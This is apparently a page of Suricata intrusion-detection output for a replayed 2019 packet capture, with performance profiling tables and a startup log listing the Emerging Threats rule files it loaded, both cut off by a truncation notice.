132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1            37         21316958      673887896     244974385          9.1b    3.64
 IPv4       2             2         11215996       21440080      16328038         32.7m    0.01
 IPv4       6           639          8651422      722274612     360489175        230.4b   92.40
 IPv4      17            54          9169316      673756988     182189219          9.8b    3.95
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1            37           114768         214060        130380          4.8m    0.61
TMM_FLOWWORKER              IPv4       2             2           138876         141826        140351        280.7k    0.04
TMM_FLOWWORKER              IPv4       6           639           114862       23931778       1175304        751.0m   94.33
TMM_FLOWWORKER              IPv4      17            54           268978        7643808        619470         33.5m    4.20
TMM_RECEIVEPCAPFILE         IPv4       1            37             4434           5510          4660        172.4k    0.02
TMM_RECEIVEPCAPFILE         IPv4       2             2             4730           4734          4732          9.5k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6           585             4422          24888          4836          2.8m    0.36
TMM_RECEIVEPCAPFILE         IPv4      17            54             4450           6262          4785        258.4k    0.03
TMM_DECODEPCAPFILE          IPv4       1            37             4608          19840          5311        196.5k    0.02
TMM_DECODEPCAPFILE          IPv4       2             2             4762           5744          5253         10.5k    0.00
TMM_DECODEPCAPFILE          IPv4       6           585             4550          18954          4866          2.8m    0.36
TMM_DECODEPCAPFILE          IPv4      17            54             4594          27992          5292        285.8k    0.04

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1            37             4858           7220          5434        201.1k  0.03  
flow                    IPv4       6           585             4760          41390          5933          3.5m  0.48  
flow                    IPv4      17            54             4766          43424          8756        472.9k  0.06  
stream                  IPv4       6           639             5180        9423700         48900         31.2m  4.28  
app-layer               IPv4      17            54             4442          68508         10295        556.0k  0.08  
detect                  IPv4       1            37            95824         191434        110589          4.1m  0.56  
detect                  IPv4       2             2           129150         131566        130358        260.7k  0.04  
detect                  IPv4       6           639            77064       23848000       1038166        663.4m  90.84 
detect                  IPv4      17            54           241012        1054726        430767         23.3m  3.19  
tcp-prune               IPv4       6           639             4456          26442          5215          3.3m  0.46  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            55             4958          21788          6327        348.0k  57.27 
http                    IPv4      17             1            99478          99478         99478         99.5k  16.37 
dns                     IPv4      17            11             9356          29804         14564        160.2k  26.36 
Proto detect            IPv4      17            11             5238          31450         11898        130.9k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6           106            19094          91312         33903          3.6m  9.63  
LOGGER_ALERT_FAST           IPv4      17             1            59622          59622         59622         59.6k  0.16  
LOGGER_UNIFIED2             IPv4       6           106            23196          75734         35853          3.8m  10.18 
LOGGER_UNIFIED2             IPv4      17             1           149722         149722        149722        149.7k  0.40  
LOGGER_JSON_ALERT           IPv4       6           106            41508         118570         63805          6.8m  18.12 
LOGGER_JSON_ALERT           IPv4      17             1            89248          89248         89248         89.2k  0.24  
LOGGER_JSON_DNS             IPv4      17             8            42462        6838276        965133          7.7m  20.68 
LOGGER_JSON_HTTP            IPv4       6           105            32358         133378         41323          4.3m  11.62 
LOGGER_JSON_FILE            IPv4       6           157            49580         181860         68895         10.8m  28.97 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1            37             5024          23966          9206       340.7k  0.51  
payload                           IPv4       6           420             4476         180786         26109        11.0m  16.43 
payload                           IPv4      17            54             6524         173958         42245         2.3m  3.42  
stream                            IPv4       6           420             4434         245326         39367        16.5m  24.77 
http_uri                          IPv4       6           105             7356          34286         11250         1.2m  1.77  
http_request_line                 IPv4       6           105             5644          29460          7988       838.8k  1.26  
http_client_body                  IPv4       6           105             4712          73324         19220         2.0m  3.02  
http_header (request)             IPv4       6           105            17156        8282622        121490        12.8m  19.11 
http_header (request trailer)     IPv4       6           105             4462           6076          4558       478.7k  0.72  
http_header_names (request)       IPv4       6           105             7772          43706         14204         1.5m  2.23  
http_accept (request)             IPv4       6           105             4832          24272          5502       577.8k  0.87  
http_referer (request)            IPv4       6           105             4676          21500          5386       565.6k  0.85  
http_content_len (request)        IPv4       6           105             4744          25308          5877       617.2k  0.92  
http_content_type (request)       IPv4       6           105             4678          32832          8584       901.3k  1.35  
http_protocol (request)           IPv4       6           105             4856          25484          5880       617.5k  0.93  
http_start (request)              IPv4       6           105             7744          29996         10481         1.1m  1.65  
http_raw_header (request)         IPv4       6           105            11298          35864         15356         1.6m  2.42  
http_method                       IPv4       6           105             5704          30868          7089       744.4k  1.12  
http_cookie (request)             IPv4       6           105             4674           7026          5015       526.6k  0.79  
http_raw_uri                      IPv4       6           105             5192           8944          5882       617.7k  0.93  
http_user_agent                   IPv4       6           105             6220          33316          8322       873.9k  1.31  
http_host                         IPv4       6           105             5642          22656          7191       755.1k  1.13  
dns_query                         IPv4      17             4            13544          21202         16267        65.1k  0.10  
http_response_line                IPv4       6           105             4784          26296          6653       698.7k  1.05  
http_header (response)            IPv4       6           105             9354          92942         27321         2.9m  4.30  
http_header (response trailer)    IPv4       6           105             4516          27496          8285       870.0k  1.30  
http_content_type (response)      IPv4       6           105             5130          33770          8899       934.5k  1.40  
http_raw_header (response)        IPv4       6           105            12688          37972         14933         1.6m  2.35  
http_cookie (response)            IPv4       6           105             4782          23726          5526       580.3k  0.87  
http_stat_code                    IPv4       6           105             4732          34392          7242       760.5k  1.14  
Total                             IPv4                  3560                                         18747        66.7m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             2            41334          57018         49176         98.4k  0.01  
PROF_DETECT_IPONLY          IPv4       2             2            47166          49380         48273         96.5k  0.01  
PROF_DETECT_IPONLY          IPv4       6           108             6348       23698060        255851         27.6m  2.80  
PROF_DETECT_IPONLY          IPv4      17             9            42088         113690         64759        582.8k  0.06  
PROF_DETECT_RULES           IPv4       1            37             4434          32412          5466        202.2k  0.02  
PROF_DETECT_RULES           IPv4       2             2             4434           4472          4453          8.9k  0.00  
PROF_DETECT_RULES           IPv4       6           639             4436        8208796        751372        480.1m  48.69 
PROF_DETECT_RULES           IPv4      17            54            62900         747520        262565         14.2m  1.44  
PROF_DETECT_STATEFUL_START    IPv4       6           263             9022        2575616        875991        230.4m  23.36 
PROF_DETECT_STATEFUL_START    IPv4      17             1            17430          17430         17430         17.4k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       1            37             4412           6644          4760        176.1k  0.02  
PROF_DETECT_STATEFUL_CONT    IPv4       2             2             4448           4470          4459          8.9k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6           639             4398          64154          8436          5.4m  0.55  
PROF_DETECT_STATEFUL_CONT    IPv4      17            54             4436          53280          6541        353.3k  0.04  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           423             4472          22560          5006          2.1m  0.21  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             8             4582           5236          4849         38.8k  0.00  
PROF_DETECT_PREFILTER       IPv4       1            37            32410          56598         38567          1.4m  0.14  
PROF_DETECT_PREFILTER       IPv4       2             2            13618          13744         13681         27.4k  0.00  
PROF_DETECT_PREFILTER       IPv4       6           639            13602        8703810        165291        105.6m  10.71 
PROF_DETECT_PREFILTER       IPv4      17            54            42654         218142         86086          4.6m  0.47  
PROF_DETECT_PF_PAYLOAD      IPv4       1            37            14106          33726         18874        698.3k  0.07  
PROF_DETECT_PF_PAYLOAD      IPv4       6           420            29738         264086         80013         33.6m  3.41  
PROF_DETECT_PF_PAYLOAD      IPv4      17            54            15364         183098         52701          2.8m  0.29  
PROF_DETECT_PF_TX           IPv4       6           423             4630        8562390        124338         52.6m  5.33  
PROF_DETECT_PF_TX           IPv4      17             4            24182          31286         26285        105.1k  0.01  
PROF_DETECT_PF_SORT1        IPv4       6           420             4552          44742          7693          3.2m  0.33  
PROF_DETECT_PF_SORT1        IPv4      17            54             4766           8900          6245        337.2k  0.03  
PROF_DETECT_PF_SORT2        IPv4       1            37             4408          17426          4935        182.6k  0.02  
PROF_DETECT_PF_SORT2        IPv4       2             2             4420           4478          4449          8.9k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6           639             4406          25554          5402          3.5m  0.35  
PROF_DETECT_PF_SORT2        IPv4      17            54             4474          20916          5496        296.8k  0.03  
PROF_DETECT_NONMPMLIST      IPv4       1            37             4436           5826          4761        176.2k  0.02  
PROF_DETECT_NONMPMLIST      IPv4       2             2             4430           4728          4579          9.2k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6           639             4430          30834          5147          3.3m  0.33  
PROF_DETECT_NONMPMLIST      IPv4      17            54             4450           8156          5128        276.9k  0.03  
PROF_DETECT_ALERT           IPv4       1            37             4416          48436          6161        228.0k  0.02  
PROF_DETECT_ALERT           IPv4       2             2             4444           4448          4446          8.9k  0.00  
PROF_DETECT_ALERT           IPv4       6           639             4408          31856          5005          3.2m  0.32  
PROF_DETECT_ALERT           IPv4      17            54             4416          21836          5539        299.2k  0.03  
PROF_DETECT_CLEANUP         IPv4       1            37             4440          20090          5076        187.8k  0.02  
PROF_DETECT_CLEANUP         IPv4       2             2             4440           4462          4451          8.9k  0.00  
PROF_DETECT_CLEANUP         IPv4       6           639             4450          32914          5265          3.4m  0.34  
PROF_DETECT_CLEANUP         IPv4      17            54             4416          30816          5425        293.0k  0.03  
PROF_DETECT_GETSGH          IPv4       1            37             4436           5758          4806        177.9k  0.02  
PROF_DETECT_GETSGH          IPv4       2             2             4688           4712          4700          9.4k  0.00  
PROF_DETECT_GETSGH          IPv4       6           639             4414          30374          5879          3.8m  0.38  
PROF_DETECT_GETSGH          IPv4      17            54             4432          30948          6569     

This file has been truncated. Go here to download in full.


suricata-report-2019-07-25-T-05-57-36-07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap.txt - (17766 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/04c847a258b82858fa76434ef923317756b33745cb75ec8c950e11a498e082d2 -r /var/pcap/07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df17528236e3b6b.pcap -vvv -k none
elapsedtime:22.122302
stderr:
stdout:
25/7/2019 -- 05:57:14 - <Info> - Configuration node 'rule-files' redefined.
25/7/2019 -- 05:57:14 - <Notice> - This is Suricata version 4.0.0 RELEASE
25/7/2019 -- 05:57:14 - <Info> - CPUs/cores online: 1
25/7/2019 -- 05:57:14 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33758 and 'request-body-inspect-window' set to 16758 after randomization.
25/7/2019 -- 05:57:14 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 31522 and 'response-body-inspect-window' set to 17173 after randomization.
25/7/2019 -- 05:57:14 - <Config> - DNS request flood protection level: 500
25/7/2019 -- 05:57:14 - <Config> - DNS per flow memcap (state-memcap): 524288
25/7/2019 -- 05:57:14 - <Config> - DNS global memcap: 16777216
25/7/2019 -- 05:57:14 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
25/7/2019 -- 05:57:14 - <Config> - preallocated 1000 hosts of size 136
25/7/2019 -- 05:57:14 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
25/7/2019 -- 05:57:14 - <Config> - using magic-file /usr/share/file/magic
25/7/2019 -- 05:57:14 - <Config> - Core dump size is unlimited.
25/7/2019 -- 05:57:14 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
25/7/2019 -- 05:57:14 - <Config> - preallocated 1000 defrag trackers of size 168
25/7/2019 -- 05:57:14 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
25/7/2019 -- 05:57:14 - <Config> - stream "prealloc-sessions": 2048 (per thread)
25/7/2019 -- 05:57:14 - <Config> - stream "memcap": 33554432
25/7/2019 -- 05:57:14 - <Config> - stream "midstream" session pickups: disabled
25/7/2019 -- 05:57:14 - <Config> - stream "async-oneside": disabled
25/7/2019 -- 05:57:14 - <Config> - stream "checksum-validation": disabled
25/7/2019 -- 05:57:14 - <Config> - stream."inline": disabled
25/7/2019 -- 05:57:14 - <Config> - stream "bypass": disabled
25/7/2019 -- 05:57:14 - <Config> - stream "max-synack-queued": 5
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "memcap": 134217728
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "depth": 0
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "toserver-chunk-size": 2519
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "toclient-chunk-size": 2580
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly.raw: enabled
25/7/2019 -- 05:57:14 - <Config> - stream.reassembly "segment-prealloc": 2048
25/7/2019 -- 05:57:14 - <Config> - Delayed detect disabled
25/7/2019 -- 05:57:14 - <Config> - pattern matchers: MPM: ac, SPM: bm
25/7/2019 -- 05:57:14 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
25/7/2019 -- 05:57:14 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
25/7/2019 -- 05:57:14 - <Config> - prefilter engines: MPM
25/7/2019 -- 05:57:14 - <Config> - IP reputation disabled
25/7/2019 -- 05:57:14 - <Perf> - Registered 148 keyword profiling counters.
25/7/2019 -- 05:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
25/7/2019 -- 05:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
25/7/2019 -- 05:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
25/7/2019 -- 05:57:19 - <Config> - No rules loaded from ET-icmp.rules.
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
25/7/2019 -- 05:57:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
25/7/2019 -- 05:57:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
25/7/2019 -- 05:57:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
25/7/2019 -- 05:57:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
25/7/2019 -- 05:57:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
25/7/2019 -- 05:57:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
25/7/2019 -- 05:57:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
25/7/2019 -- 05:57:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
25/7/2019 -- 05:57:26 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
25/7/2019 -- 05:57:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
25/7/2019 -- 05:57:27 - <Config> - No rules loaded from local.rules.
25/7/2019 -- 05:57:27 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
25/7/2019 -- 05:57:27 - <Info> - Threshold config parsed: 0 rule(s) found
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tcp-packet
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tcp-stream
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for udp-packet
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for other-ip
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_uri
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_request_line
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_client_body
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_response_line
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header_names
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_header_names
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_accept
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_accept_enc
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_accept_lang
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_referer
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_connection
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_len
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_len
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_type
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_content_type
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_start
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_start
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_header
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_method
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_cookie
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_cookie
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_uri
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_user_agent
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_host
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_raw_host
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_stat_msg
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_stat_code
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for dns_query
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_sni
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_cert_issuer
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_cert_subject
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for tls_cert_serial
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for dce_stub_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for dce_stub_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_protocol
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_software
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for ssh_software
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for file_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for file_data
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_request_line
25/7/2019 -- 05:57:28 - <Perf> - using shared mpm ctx' for http_response_line
25/7/2019 -- 05:57:28 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
25/7/2019 -- 05:57:28 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
25/7/2019 -- 05:57:28 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
25/7/2019 -- 05:57:28 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
25/7/2019 -- 05:57:28 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
25/7/2019 -- 05:57:28 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
25/7/2019 -- 05:57:28 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
25/7/2019 -- 05:57:28 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
25/7/2019 -- 05:57:33 - <Perf> - Unique rule groups: 104
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toserver TCP packet": 35
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toclient TCP packet": 17
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toserver TCP stream": 33
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toclient TCP stream": 19
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toserver UDP packet": 27
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "toclient UDP packet": 17
25/7/2019 -- 05:57:33 - <Perf> - Builtin MPM "other IP packet": 3
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_uri": 14
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_request_line": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_client_body": 6
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_response_line": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_header": 10
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_header": 6
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_header_names": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_accept": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_referer": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_content_len": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_content_type": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_content_type": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_protocol": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_start": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_method": 5
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_cookie": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_cookie": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver http_host": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver dns_query": 4
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver tls_sni": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toserver file_data": 1
25/7/2019 -- 05:57:33 - <Perf> - AppLayer MPM "toclient file_data": 7
25/7/2019 -- 05:57:36 - <Perf> - Registered 39590 rule profiling counters.
25/7/2019 -- 05:57:36 - <Info> - fast output device (regular) initialized: alert
25/7/2019 -- 05:57:36 - <Info> - eve-log output device (regular) initialized: eve.json
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'alert'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'http'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'dns'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'tls'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'files'
25/7/2019 -- 05:57:36 - <Config> - enabling 'eve-log' module 'ssh'
25/7/2019 -- 05:57:36 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
25/7/2019 -- 05:57:36 - <Info> - stats output device (regular) initialized: stats.log
25/7/2019 -- 05:57:36 - <Config> - AutoFP mode using "Hash" flow load balancer
25/7/2019 -- 05:57:36 - <Info> - reading pcap file /var/pcap/07252019.0557-b7572bce097f8fd32e355aeb5e763be179de04d057e20ccb2df

This file has been truncated. Go here to download in full.


